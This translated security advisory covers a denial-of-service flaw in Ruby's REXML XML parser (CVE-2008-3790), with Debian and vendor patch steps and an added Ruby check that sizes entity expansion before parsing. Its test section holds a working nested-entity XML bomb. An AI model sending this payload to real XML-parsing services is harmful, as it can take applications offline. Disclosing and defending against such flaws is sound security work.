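Ruby REXML Library Remote Denial of Service Vulnerability

Published: 2008-08-23
Updated: 2008-08-25

Affected systems:
Yukihiro Matsumoto Ruby 1.9.x
Yukihiro Matsumoto Ruby 1.8.x
Description:
BUGTRAQ  ID: 30802
CVE(CAN) ID: CVE-2008-3790

Ruby is a powerful object-oriented scripting language.

Ruby uses the REXML library to parse incoming XML requests. If a user is tricked into visiting a malicious web page, an attacker can use a technique known as XML entity explosion to remotely bring down any application that parses XML, including Ruby and Ruby on Rails.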

<*Source: Michael Koziarski
          Luka Treiber

  Links: http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/
         http://weblog.rubyonrails.com/2008/8/23/dos-vulnerabilities-in-rexml
         http://secunia.com/advisories/31602/
         http://www.debian.org/security/2008/dsa-1652
         http://www.debian.org/security/2008/dsa-1651
*>

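Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!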

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
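
Each entity in the sample above references the next one ten times, so the single reference in the body expands to one million copies of the leaf entity g. The following Ruby sketch is an added example, not code from the advisory or from the vendor patch: it sizes that expansion arithmetically, without building the expanded string, so an application can reject the document before handing it to a parser. It assumes entities are declared only in the internal DTD subset; the names expansion_size and within_budget? and the 1 MiB budget are hypothetical.

```ruby
# Added example: measure entity expansion without performing it.
ENTITY_DECL = /<!ENTITY\s+([\w.-]+)\s+(["'])(.*?)\2\s*>/m
ENTITY_REF  = /&([\w.-]+);/
PREDEFINED  = %w[lt gt amp apos quot].freeze

# Bytes that the entity references in the document body would expand to.
def expansion_size(xml)
  decls = {}
  xml.scan(ENTITY_DECL) { |name, _quote, value| decls[name] ||= value } # first declaration wins
  memo = {}
  size_of = lambda do |name, stack|
    return 1 if PREDEFINED.include?(name)          # &lt; &amp; ... are one character each
    return memo[name] if memo.key?(name)           # each entity is sized only once
    raise ArgumentError, "recursive entity &#{name};" if stack.include?(name)
    value = decls[name] or return 0                # undeclared: a parser rejects it anyway
    literal = value.gsub(ENTITY_REF, "").bytesize
    nested  = value.scan(ENTITY_REF).flatten.sum { |ref| size_of.call(ref, stack + [name]) }
    memo[name] = literal + nested
  end
  body = xml.sub(/<!DOCTYPE.*?\]>/m, "")           # references outside the DTD
  body.scan(ENTITY_REF).flatten.sum { |ref| size_of.call(ref, []) }
end

# True when the expansion fits the budget (assumed limit: 1 MiB) and is not recursive.
def within_budget?(xml, limit = 1_048_576)
  expansion_size(xml) <= limit
rescue ArgumentError
  false
end

# Sample input: the document from the advisory's test method.
SAMPLE = <<~'XML'
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE member [
    <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
    <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
    <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
    <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
    <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
    <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
    <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
  ]>
  <member>
  &a;
  </member>
XML

puts "document: #{SAMPLE.bytesize} bytes, entity expansion: #{expansion_size(SAMPLE)} bytes"
puts "within budget: #{within_budget?(SAMPLE)}"
```

Because each entity is sized once and the result reused, the check runs in time proportional to the number of declarations rather than to the expanded size.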

Recommendations:
Vendor patches:

Debian
------
Debian has released a security advisory (DSA-1651-1) and corresponding patches for this issue:
DSA-1651-1: New ruby1.8 packages fix several vulnerabilities
Link: http://www.debian.org/security/2008/dsa-1651

Patch downloads:

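Patch installation:

1. Installing the patch packages manually:

  First, download the patch package with the following command:
  # wget url  (url is the patch download link)

  Then install the patch with the following command:
  # dpkg -i file.deb (file is the name of the corresponding patch package)

2. Installing the patch packages automatically with apt-get:

   First, update the internal database with the following command:
   # apt-get update

   Then install the updated packages with the following command:
   # apt-get upgrade

Yukihiro Matsumoto
------------------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site: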

http://www.ruby-lang.org/security/20080823rexml/rexml-expansion-fix.rb

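This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.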